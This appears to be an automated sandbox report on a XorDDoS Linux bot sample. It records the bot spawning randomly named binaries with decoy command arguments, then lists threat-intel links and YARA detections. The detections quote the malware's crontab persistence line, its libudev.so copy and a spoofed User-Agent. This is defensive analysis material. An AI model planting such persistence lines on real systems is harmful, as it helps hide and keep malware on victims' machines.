yimgbvpxre (PID: 10369, Parent: 10368, MD5: adef4f6dadd60e09a59e134c5a659f30) Arguments: /usr/bin/yimgbvpxre "cat resolv.conf" 9452

yimgbvpxre New Fork (PID: 10370, Parent: 10369)

iJl2Sb6qRa New Fork (PID: 10379, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10380, Parent: 10379)

hjqubeqdgt (PID: 10380, Parent: 10379, MD5: 3173c41f0c1b9dfa58d0d6379d71d08f) Arguments: /usr/bin/hjqubeqdgt uptime 9452

hjqubeqdgt New Fork (PID: 10381, Parent: 10380)

iJl2Sb6qRa New Fork (PID: 10390, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10391, Parent: 10390)

hjqubeqdgt (PID: 10391, Parent: 10390, MD5: 3173c41f0c1b9dfa58d0d6379d71d08f) Arguments: /usr/bin/hjqubeqdgt su 9452

hjqubeqdgt New Fork (PID: 10393, Parent: 10391)

iJl2Sb6qRa New Fork (PID: 10401, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10402, Parent: 10401)

hjqubeqdgt (PID: 10402, Parent: 10401, MD5: 3173c41f0c1b9dfa58d0d6379d71d08f) Arguments: /usr/bin/hjqubeqdgt "cd /etc" 9452

hjqubeqdgt New Fork (PID: 10403, Parent: 10402)

iJl2Sb6qRa New Fork (PID: 10412, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10413, Parent: 10412)

hjqubeqdgt (PID: 10413, Parent: 10412, MD5: 3173c41f0c1b9dfa58d0d6379d71d08f) Arguments: /usr/bin/hjqubeqdgt id 9452

hjqubeqdgt New Fork (PID: 10414, Parent: 10413)

iJl2Sb6qRa New Fork (PID: 10423, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10424, Parent: 10423)

hjqubeqdgt (PID: 10424, Parent: 10423, MD5: 3173c41f0c1b9dfa58d0d6379d71d08f) Arguments: /usr/bin/hjqubeqdgt "ifconfig eth0" 9452

hjqubeqdgt New Fork (PID: 10425, Parent: 10424)

iJl2Sb6qRa New Fork (PID: 10434, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10435, Parent: 10434)

tqltcdysxm (PID: 10435, Parent: 10434, MD5: 7d8d4986b078e4b4d548d598944da309) Arguments: /usr/bin/tqltcdysxm top 9452

tqltcdysxm New Fork (PID: 10437, Parent: 10435)

iJl2Sb6qRa New Fork (PID: 10445, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10446, Parent: 10445)

tqltcdysxm (PID: 10446, Parent: 10445, MD5: 7d8d4986b078e4b4d548d598944da309) Arguments: /usr/bin/tqltcdysxm "route -n" 9452

tqltcdysxm New Fork (PID: 10447, Parent: 10446)

iJl2Sb6qRa New Fork (PID: 10455, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10457, Parent: 10455)

tqltcdysxm (PID: 10457, Parent: 3310, MD5: 7d8d4986b078e4b4d548d598944da309) Arguments: /usr/bin/tqltcdysxm "netstat -antop" 9452

tqltcdysxm New Fork (PID: 10466, Parent: 10457)

iJl2Sb6qRa New Fork (PID: 10458, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10459, Parent: 10458)

tqltcdysxm (PID: 10459, Parent: 3310, MD5: 7d8d4986b078e4b4d548d598944da309) Arguments: /usr/bin/tqltcdysxm gnome-terminal 9452

tqltcdysxm New Fork (PID: 10464, Parent: 10459)

iJl2Sb6qRa New Fork (PID: 10461, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10462, Parent: 10461)

tqltcdysxm (PID: 10462, Parent: 10461, MD5: 7d8d4986b078e4b4d548d598944da309) Arguments: /usr/bin/tqltcdysxm "cat resolv.conf" 9452

tqltcdysxm New Fork (PID: 10472, Parent: 10462)

iJl2Sb6qRa New Fork (PID: 10489, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10490, Parent: 10489)

ppcowopkho (PID: 10490, Parent: 3310, MD5: a05d99f8205a2f4eac9b068780a867b6) Arguments: /usr/bin/ppcowopkho top 9452

ppcowopkho New Fork (PID: 10492, Parent: 10490)

iJl2Sb6qRa New Fork (PID: 10491, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10493, Parent: 10491)

ppcowopkho (PID: 10493, Parent: 3310, MD5: a05d99f8205a2f4eac9b068780a867b6) Arguments: /usr/bin/ppcowopkho whoami 9452

ppcowopkho New Fork (PID: 10497, Parent: 10493)

iJl2Sb6qRa New Fork (PID: 10494, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10495, Parent: 10494)

ppcowopkho (PID: 10495, Parent: 3310, MD5: a05d99f8205a2f4eac9b068780a867b6) Arguments: /usr/bin/ppcowopkho ifconfig 9452

ppcowopkho New Fork (PID: 10505, Parent: 10495)

iJl2Sb6qRa New Fork (PID: 10496, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10499, Parent: 10496)

ppcowopkho (PID: 10499, Parent: 3310, MD5: a05d99f8205a2f4eac9b068780a867b6) Arguments: /usr/bin/ppcowopkho uptime 9452

ppcowopkho New Fork (PID: 10510, Parent: 10499)

iJl2Sb6qRa New Fork (PID: 10500, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10503, Parent: 10500)

ppcowopkho (PID: 10503, Parent: 3310, MD5: a05d99f8205a2f4eac9b068780a867b6) Arguments: /usr/bin/ppcowopkho sh 9452

ppcowopkho New Fork (PID: 10515, Parent: 10503)

iJl2Sb6qRa New Fork (PID: 10544, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10545, Parent: 10544)

fzsohllyia (PID: 10545, Parent: 3310, MD5: e56044b8511b441d2e35e614289e66cc) Arguments: /usr/bin/fzsohllyia top 9452

fzsohllyia New Fork (PID: 10548, Parent: 10545)

iJl2Sb6qRa New Fork (PID: 10546, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10547, Parent: 10546)

fzsohllyia (PID: 10547, Parent: 3310, MD5: e56044b8511b441d2e35e614289e66cc) Arguments: /usr/bin/fzsohllyia bash 9452

fzsohllyia New Fork (PID: 10559, Parent: 10547)

iJl2Sb6qRa New Fork (PID: 10549, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10551, Parent: 10549)

fzsohllyia (PID: 10551, Parent: 3310, MD5: e56044b8511b441d2e35e614289e66cc) Arguments: /usr/bin/fzsohllyia bash 9452

fzsohllyia New Fork (PID: 10561, Parent: 10551)

iJl2Sb6qRa New Fork (PID: 10552, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10555, Parent: 10552)

fzsohllyia (PID: 10555, Parent: 3310, MD5: e56044b8511b441d2e35e614289e66cc) Arguments: /usr/bin/fzsohllyia whoami 9452

fzsohllyia New Fork (PID: 10566, Parent: 10555)

iJl2Sb6qRa New Fork (PID: 10557, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10563, Parent: 10557)

fzsohllyia (PID: 10563, Parent: 3310, MD5: e56044b8511b441d2e35e614289e66cc) Arguments: /usr/bin/fzsohllyia ifconfig 9452

fzsohllyia New Fork (PID: 10574, Parent: 10563)

iJl2Sb6qRa New Fork (PID: 10601, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10602, Parent: 10601)

qkefrqjuaf (PID: 10602, Parent: 3310, MD5: c5c77fa56b7239e1b5fe8c0888e843f5) Arguments: /usr/bin/qkefrqjuaf su 9452

qkefrqjuaf New Fork (PID: 10606, Parent: 10602)

iJl2Sb6qRa New Fork (PID: 10603, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10604, Parent: 10603)

qkefrqjuaf (PID: 10604, Parent: 3310, MD5: c5c77fa56b7239e1b5fe8c0888e843f5) Arguments: /usr/bin/qkefrqjuaf su 9452

qkefrqjuaf New Fork (PID: 10608, Parent: 10604)

iJl2Sb6qRa New Fork (PID: 10605, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10607, Parent: 10605)

qkefrqjuaf (PID: 10607, Parent: 3310, MD5: c5c77fa56b7239e1b5fe8c0888e843f5) Arguments: /usr/bin/qkefrqjuaf "echo \"find\"" 9452

qkefrqjuaf New Fork (PID: 10614, Parent: 10607)

iJl2Sb6qRa New Fork (PID: 10609, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10610, Parent: 10609)

qkefrqjuaf (PID: 10610, Parent: 3310, MD5: c5c77fa56b7239e1b5fe8c0888e843f5) Arguments: /usr/bin/qkefrqjuaf "netstat -an" 9452

qkefrqjuaf New Fork (PID: 10613, Parent: 10610)

iJl2Sb6qRa New Fork (PID: 10611, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10616, Parent: 10611)

qkefrqjuaf (PID: 10616, Parent: 10611, MD5: c5c77fa56b7239e1b5fe8c0888e843f5) Arguments: /usr/bin/qkefrqjuaf "ls -la" 9452

qkefrqjuaf New Fork (PID: 10620, Parent: 10616)

iJl2Sb6qRa New Fork (PID: 10656, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10657, Parent: 10656)

rbihsknkpv (PID: 10657, Parent: 3310, MD5: 0288fab43e01f9089db9bbcb7cbe3ebd) Arguments: /usr/bin/rbihsknkpv ls 9452

rbihsknkpv New Fork (PID: 10661, Parent: 10657)

iJl2Sb6qRa New Fork (PID: 10658, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10659, Parent: 10658)

rbihsknkpv (PID: 10659, Parent: 3310, MD5: 0288fab43e01f9089db9bbcb7cbe3ebd) Arguments: /usr/bin/rbihsknkpv ls 9452

rbihsknkpv New Fork (PID: 10672, Parent: 10659)

iJl2Sb6qRa New Fork (PID: 10660, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10663, Parent: 10660)

rbihsknkpv (PID: 10663, Parent: 3310, MD5: 0288fab43e01f9089db9bbcb7cbe3ebd) Arguments: /usr/bin/rbihsknkpv id 9452

rbihsknkpv New Fork (PID: 10675, Parent: 10663)

iJl2Sb6qRa New Fork (PID: 10664, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10667, Parent: 10664)

rbihsknkpv (PID: 10667, Parent: 3310, MD5: 0288fab43e01f9089db9bbcb7cbe3ebd) Arguments: /usr/bin/rbihsknkpv "grep \"A\"" 9452

rbihsknkpv New Fork (PID: 10671, Parent: 10667)

iJl2Sb6qRa New Fork (PID: 10670, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10674, Parent: 10670)

rbihsknkpv (PID: 10674, Parent: 10670, MD5: 0288fab43e01f9089db9bbcb7cbe3ebd) Arguments: /usr/bin/rbihsknkpv who 9452

rbihsknkpv New Fork (PID: 10679, Parent: 10674)

iJl2Sb6qRa New Fork (PID: 10711, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10712, Parent: 10711)

eqbvlwquue (PID: 10712, Parent: 3310, MD5: 5d3078f2fa3ca5271fd133aad642d232) Arguments: /usr/bin/eqbvlwquue "netstat -an" 9452

eqbvlwquue New Fork (PID: 10714, Parent: 10712)

iJl2Sb6qRa New Fork (PID: 10713, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10715, Parent: 10713)

eqbvlwquue (PID: 10715, Parent: 3310, MD5: 5d3078f2fa3ca5271fd133aad642d232) Arguments: /usr/bin/eqbvlwquue su 9452

eqbvlwquue New Fork (PID: 10722, Parent: 10715)

iJl2Sb6qRa New Fork (PID: 10717, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10720, Parent: 10717)

eqbvlwquue (PID: 10720, Parent: 3310, MD5: 5d3078f2fa3ca5271fd133aad642d232) Arguments: /usr/bin/eqbvlwquue "sleep 1" 9452

eqbvlwquue New Fork (PID: 10734, Parent: 10720)

iJl2Sb6qRa New Fork (PID: 10723, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10726, Parent: 10723)

eqbvlwquue (PID: 10726, Parent: 3310, MD5: 5d3078f2fa3ca5271fd133aad642d232) Arguments: /usr/bin/eqbvlwquue "cd /etc" 9452

eqbvlwquue New Fork (PID: 10739, Parent: 10726)

iJl2Sb6qRa New Fork (PID: 10727, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10731, Parent: 10727)

eqbvlwquue (PID: 10731, Parent: 3310, MD5: 5d3078f2fa3ca5271fd133aad642d232) Arguments: /usr/bin/eqbvlwquue "cat resolv.conf" 9452

eqbvlwquue New Fork (PID: 10746, Parent: 10731)

iJl2Sb6qRa New Fork (PID: 10766, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10767, Parent: 10766)

xjmgjvgxwo (PID: 10767, Parent: 3310, MD5: 9faeab7565afcf89b3b068708d7e849f) Arguments: /usr/bin/xjmgjvgxwo uptime 9452

xjmgjvgxwo New Fork (PID: 10773, Parent: 10767)

iJl2Sb6qRa New Fork (PID: 10768, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10769, Parent: 10768)

xjmgjvgxwo (PID: 10769, Parent: 3310, MD5: 9faeab7565afcf89b3b068708d7e849f) Arguments: /usr/bin/xjmgjvgxwo "cd /etc" 9452

xjmgjvgxwo New Fork (PID: 10778, Parent: 10769)

iJl2Sb6qRa New Fork (PID: 10770, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10771, Parent: 10770)

xjmgjvgxwo (PID: 10771, Parent: 3310, MD5: 9faeab7565afcf89b3b068708d7e849f) Arguments: /usr/bin/xjmgjvgxwo "echo \"find\"" 9452

xjmgjvgxwo New Fork (PID: 10786, Parent: 10771)

iJl2Sb6qRa New Fork (PID: 10772, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10774, Parent: 10772)

xjmgjvgxwo (PID: 10774, Parent: 3310, MD5: 9faeab7565afcf89b3b068708d7e849f) Arguments: /usr/bin/xjmgjvgxwo uptime 9452

xjmgjvgxwo New Fork (PID: 10787, Parent: 10774)

iJl2Sb6qRa New Fork (PID: 10776, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10780, Parent: 10776)

xjmgjvgxwo (PID: 10780, Parent: 3310, MD5: 9faeab7565afcf89b3b068708d7e849f) Arguments: /usr/bin/xjmgjvgxwo uptime 9452

xjmgjvgxwo New Fork (PID: 10794, Parent: 10780)

iJl2Sb6qRa New Fork (PID: 10821, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10822, Parent: 10821)

hazvgjwinh (PID: 10822, Parent: 3310, MD5: 43229f935005fa2b1516f2146006cbc3) Arguments: /usr/bin/hazvgjwinh "ps -ef" 9452

hazvgjwinh New Fork (PID: 10826, Parent: 10822)

iJl2Sb6qRa New Fork (PID: 10823, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10824, Parent: 10823)

hazvgjwinh (PID: 10824, Parent: 3310, MD5: 43229f935005fa2b1516f2146006cbc3) Arguments: /usr/bin/hazvgjwinh "route -n" 9452

hazvgjwinh New Fork (PID: 10829, Parent: 10824)

iJl2Sb6qRa New Fork (PID: 10825, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10827, Parent: 10825)

hazvgjwinh (PID: 10827, Parent: 3310, MD5: 43229f935005fa2b1516f2146006cbc3) Arguments: /usr/bin/hazvgjwinh bash 9452

hazvgjwinh New Fork (PID: 10830, Parent: 10827)

iJl2Sb6qRa New Fork (PID: 10828, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10831, Parent: 10828)

hazvgjwinh (PID: 10831, Parent: 10828, MD5: 43229f935005fa2b1516f2146006cbc3) Arguments: /usr/bin/hazvgjwinh id 9452

hazvgjwinh New Fork (PID: 10838, Parent: 10831)

iJl2Sb6qRa New Fork (PID: 10836, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10840, Parent: 10836)

hazvgjwinh (PID: 10840, Parent: 3310, MD5: 43229f935005fa2b1516f2146006cbc3) Arguments: /usr/bin/hazvgjwinh "ps -ef" 9452

hazvgjwinh New Fork (PID: 10849, Parent: 10840)

iJl2Sb6qRa New Fork (PID: 10876, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10877, Parent: 10876)

uriorqqkrk (PID: 10877, Parent: 3310, MD5: 34adf7e33544d8fee3b2e089260b1273) Arguments: /usr/bin/uriorqqkrk "cd /etc" 9452

uriorqqkrk New Fork (PID: 10880, Parent: 10877)

iJl2Sb6qRa New Fork (PID: 10878, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10879, Parent: 10878)

uriorqqkrk (PID: 10879, Parent: 10878, MD5: 34adf7e33544d8fee3b2e089260b1273) Arguments: /usr/bin/uriorqqkrk top 9452

uriorqqkrk New Fork (PID: 10890, Parent: 10879)

iJl2Sb6qRa New Fork (PID: 10882, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10884, Parent: 10882)

uriorqqkrk (PID: 10884, Parent: 3310, MD5: 34adf7e33544d8fee3b2e089260b1273) Arguments: /usr/bin/uriorqqkrk pwd 9452

uriorqqkrk New Fork (PID: 10897, Parent: 10884)

iJl2Sb6qRa New Fork (PID: 10886, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10891, Parent: 10886)

uriorqqkrk (PID: 10891, Parent: 10886, MD5: 34adf7e33544d8fee3b2e089260b1273) Arguments: /usr/bin/uriorqqkrk "grep \"A\"" 9452

uriorqqkrk New Fork (PID: 10904, Parent: 10891)

iJl2Sb6qRa New Fork (PID: 10894, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10896, Parent: 10894)

uriorqqkrk (PID: 10896, Parent: 3310, MD5: 34adf7e33544d8fee3b2e089260b1273) Arguments: /usr/bin/uriorqqkrk id 9452

uriorqqkrk New Fork (PID: 10906, Parent: 10896)

iJl2Sb6qRa New Fork (PID: 10931, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10932, Parent: 10931)

tchbigxomm (PID: 10932, Parent: 3310, MD5: c0397b437f94080dbd9ec7afe1846ad2) Arguments: /usr/bin/tchbigxomm id 9452

tchbigxomm New Fork (PID: 10934, Parent: 10932)

iJl2Sb6qRa New Fork (PID: 10933, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10935, Parent: 10933)

tchbigxomm (PID: 10935, Parent: 10933, MD5: c0397b437f94080dbd9ec7afe1846ad2) Arguments: /usr/bin/tchbigxomm "netstat -an" 9452

tchbigxomm New Fork (PID: 10936, Parent: 10935)

iJl2Sb6qRa New Fork (PID: 10937, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10938, Parent: 10937)

tchbigxomm (PID: 10938, Parent: 3310, MD5: c0397b437f94080dbd9ec7afe1846ad2) Arguments: /usr/bin/tchbigxomm "grep \"A\"" 9452

tchbigxomm New Fork (PID: 10940, Parent: 10938)

iJl2Sb6qRa New Fork (PID: 10939, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10942, Parent: 10939)

tchbigxomm (PID: 10942, Parent: 10939, MD5: c0397b437f94080dbd9ec7afe1846ad2) Arguments: /usr/bin/tchbigxomm pwd 9452

tchbigxomm New Fork (PID: 10944, Parent: 10942)

iJl2Sb6qRa New Fork (PID: 10946, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10948, Parent: 10946)

tchbigxomm (PID: 10948, Parent: 3310, MD5: c0397b437f94080dbd9ec7afe1846ad2) Arguments: /usr/bin/tchbigxomm "netstat -an" 9452

tchbigxomm New Fork (PID: 10961, Parent: 10948)

iJl2Sb6qRa New Fork (PID: 10986, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10987, Parent: 10986)

inquziyqfh (PID: 10987, Parent: 3310, MD5: c5240c03174adc647b14472a80726172) Arguments: /usr/bin/inquziyqfh "ifconfig eth0" 9452

inquziyqfh New Fork (PID: 10991, Parent: 10987)

iJl2Sb6qRa New Fork (PID: 10988, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10989, Parent: 10988)

inquziyqfh (PID: 10989, Parent: 3310, MD5: c5240c03174adc647b14472a80726172) Arguments: /usr/bin/inquziyqfh id 9452

inquziyqfh New Fork (PID: 10996, Parent: 10989)

iJl2Sb6qRa New Fork (PID: 10990, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10992, Parent: 10990)

inquziyqfh (PID: 10992, Parent: 3310, MD5: c5240c03174adc647b14472a80726172) Arguments: /usr/bin/inquziyqfh ls 9452

inquziyqfh New Fork (PID: 11001, Parent: 10992)

iJl2Sb6qRa New Fork (PID: 10993, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10995, Parent: 10993)

inquziyqfh (PID: 10995, Parent: 3310, MD5: c5240c03174adc647b14472a80726172) Arguments: /usr/bin/inquziyqfh su 9452

inquziyqfh New Fork (PID: 11006, Parent: 10995)

iJl2Sb6qRa New Fork (PID: 10997, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 10999, Parent: 10997)

inquziyqfh (PID: 10999, Parent: 10997, MD5: c5240c03174adc647b14472a80726172) Arguments: /usr/bin/inquziyqfh top 9452

inquziyqfh New Fork (PID: 11012, Parent: 10999)

iJl2Sb6qRa New Fork (PID: 11041, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11042, Parent: 11041)

hzocakrfjc (PID: 11042, Parent: 3310, MD5: 2493ae71a6b7a72f3c38d4e611f4a5e1) Arguments: /usr/bin/hzocakrfjc bash 9452

hzocakrfjc New Fork (PID: 11046, Parent: 11042)

iJl2Sb6qRa New Fork (PID: 11043, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11044, Parent: 11043)

hzocakrfjc (PID: 11044, Parent: 3310, MD5: 2493ae71a6b7a72f3c38d4e611f4a5e1) Arguments: /usr/bin/hzocakrfjc whoami 9452

hzocakrfjc New Fork (PID: 11051, Parent: 11044)

iJl2Sb6qRa New Fork (PID: 11045, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11047, Parent: 11045)

hzocakrfjc (PID: 11047, Parent: 3310, MD5: 2493ae71a6b7a72f3c38d4e611f4a5e1) Arguments: /usr/bin/hzocakrfjc gnome-terminal 9452

hzocakrfjc New Fork (PID: 11055, Parent: 11047)

iJl2Sb6qRa New Fork (PID: 11048, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11050, Parent: 11048)

hzocakrfjc (PID: 11050, Parent: 3310, MD5: 2493ae71a6b7a72f3c38d4e611f4a5e1) Arguments: /usr/bin/hzocakrfjc "ps -ef" 9452

hzocakrfjc New Fork (PID: 11064, Parent: 11050)

iJl2Sb6qRa New Fork (PID: 11053, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11056, Parent: 11053)

hzocakrfjc (PID: 11056, Parent: 3310, MD5: 2493ae71a6b7a72f3c38d4e611f4a5e1) Arguments: /usr/bin/hzocakrfjc "netstat -antop" 9452

hzocakrfjc New Fork (PID: 11062, Parent: 11056)

iJl2Sb6qRa New Fork (PID: 11106, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11107, Parent: 11106)

eyvooyilzg (PID: 11107, Parent: 3310, MD5: b3c0433cb96af4d84583a4cb9814d55d) Arguments: /usr/bin/eyvooyilzg "grep \"A\"" 9452

eyvooyilzg New Fork (PID: 11116, Parent: 11107)

iJl2Sb6qRa New Fork (PID: 11108, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11109, Parent: 11108)

eyvooyilzg (PID: 11109, Parent: 3310, MD5: b3c0433cb96af4d84583a4cb9814d55d) Arguments: /usr/bin/eyvooyilzg uptime 9452

eyvooyilzg New Fork (PID: 11119, Parent: 11109)

iJl2Sb6qRa New Fork (PID: 11110, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11111, Parent: 11110)

eyvooyilzg (PID: 11111, Parent: 3310, MD5: b3c0433cb96af4d84583a4cb9814d55d) Arguments: /usr/bin/eyvooyilzg "cd /etc" 9452

eyvooyilzg New Fork (PID: 11115, Parent: 11111)

iJl2Sb6qRa New Fork (PID: 11112, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11113, Parent: 11112)

eyvooyilzg (PID: 11113, Parent: 3310, MD5: b3c0433cb96af4d84583a4cb9814d55d) Arguments: /usr/bin/eyvooyilzg pwd 9452

eyvooyilzg New Fork (PID: 11122, Parent: 11113)

iJl2Sb6qRa New Fork (PID: 11114, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11117, Parent: 11114)

eyvooyilzg (PID: 11117, Parent: 3310, MD5: b3c0433cb96af4d84583a4cb9814d55d) Arguments: /usr/bin/eyvooyilzg "route -n" 9452

eyvooyilzg New Fork (PID: 11126, Parent: 11117)

iJl2Sb6qRa New Fork (PID: 11161, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11162, Parent: 11161)

yklepkdsai (PID: 11162, Parent: 3310, MD5: 77fa98c6c1de36087a4437c1b6aeb7ef) Arguments: /usr/bin/yklepkdsai "netstat -an" 9452

yklepkdsai New Fork (PID: 11168, Parent: 11162)

iJl2Sb6qRa New Fork (PID: 11163, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11164, Parent: 11163)

yklepkdsai (PID: 11164, Parent: 3310, MD5: 77fa98c6c1de36087a4437c1b6aeb7ef) Arguments: /usr/bin/yklepkdsai whoami 9452

yklepkdsai New Fork (PID: 11175, Parent: 11164)

iJl2Sb6qRa New Fork (PID: 11165, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11166, Parent: 11165)

yklepkdsai (PID: 11166, Parent: 3310, MD5: 77fa98c6c1de36087a4437c1b6aeb7ef) Arguments: /usr/bin/yklepkdsai "ps -ef" 9452

yklepkdsai New Fork (PID: 11173, Parent: 11166)

iJl2Sb6qRa New Fork (PID: 11167, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11169, Parent: 11167)

yklepkdsai (PID: 11169, Parent: 3310, MD5: 77fa98c6c1de36087a4437c1b6aeb7ef) Arguments: /usr/bin/yklepkdsai "cat resolv.conf" 9452

yklepkdsai New Fork (PID: 11172, Parent: 11169)

iJl2Sb6qRa New Fork (PID: 11170, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11171, Parent: 11170)

yklepkdsai (PID: 11171, Parent: 3310, MD5: 77fa98c6c1de36087a4437c1b6aeb7ef) Arguments: /usr/bin/yklepkdsai who 9452

yklepkdsai New Fork (PID: 11184, Parent: 11171)

iJl2Sb6qRa New Fork (PID: 11216, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11217, Parent: 11216)

gacoxqlwsi (PID: 11217, Parent: 3310, MD5: bff7bbe7deccd699fdb646a66fe06517) Arguments: /usr/bin/gacoxqlwsi su 9452

gacoxqlwsi New Fork (PID: 11225, Parent: 11217)

iJl2Sb6qRa New Fork (PID: 11218, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11219, Parent: 11218)

gacoxqlwsi (PID: 11219, Parent: 3310, MD5: bff7bbe7deccd699fdb646a66fe06517) Arguments: /usr/bin/gacoxqlwsi ifconfig 9452

gacoxqlwsi New Fork (PID: 11227, Parent: 11219)

iJl2Sb6qRa New Fork (PID: 11220, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11221, Parent: 11220)

gacoxqlwsi (PID: 11221, Parent: 3310, MD5: bff7bbe7deccd699fdb646a66fe06517) Arguments: /usr/bin/gacoxqlwsi "ls -la" 9452

gacoxqlwsi New Fork (PID: 11230, Parent: 11221)

iJl2Sb6qRa New Fork (PID: 11222, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11223, Parent: 11222)

gacoxqlwsi (PID: 11223, Parent: 3310, MD5: bff7bbe7deccd699fdb646a66fe06517) Arguments: /usr/bin/gacoxqlwsi "ifconfig eth0" 9452

gacoxqlwsi New Fork (PID: 11228, Parent: 11223)

iJl2Sb6qRa New Fork (PID: 11224, Parent: 9452)

iJl2Sb6qRa New Fork (PID: 11226, Parent: 11224)

gacoxqlwsi (PID: 11226, Parent: 3310, MD5: bff7bbe7deccd699fdb646a66fe06517) Arguments: /usr/bin/gacoxqlwsi ls 9452

gacoxqlwsi New Fork (PID: 11231, Parent: 11226)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XOR DDoS, XORDDOS	Linux DDoS C&C Malware	No Attribution	http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/ https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
iJl2Sb6qRa	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
iJl2Sb6qRa	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
iJl2Sb6qRa	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
iJl2Sb6qRa	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1

Dropped Files

Source	Rule	Description	Author	Strings
/lib/libudev.so	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
